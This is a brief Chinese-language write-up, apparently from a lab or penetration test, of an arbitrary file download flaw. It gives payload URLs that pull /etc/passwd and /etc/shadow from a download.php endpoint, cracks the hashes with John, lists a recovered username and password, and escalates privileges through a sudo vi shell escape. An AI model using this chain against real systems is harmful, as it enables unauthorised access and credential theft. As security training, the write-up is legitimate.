1.基本信息:
漏洞扫描:发现是任意文件下载漏洞
2.漏洞详情
具体步骤
(1)发现一个源代码中的下载链接,尝试修改链接为:/etc/passwd,发现可以下载
Payload: http://172.168.20.33/download.php?f=/etc/passwd
(2)下载shadow:http://172.168.20.33/download.php?f=/etc/shadow
把下好的文件拖到kali虚拟机里面, ls 查看验证
Kali破解密码命令:johu shadow
破解到一个普通用户账号密码:lihua/12345678
利用其3389远程登陆服务登陆并进行提权
Sudo vi 进入vi模式后Esc健退出编辑 :!/bin/bsh
查看权限已经成功
提权成功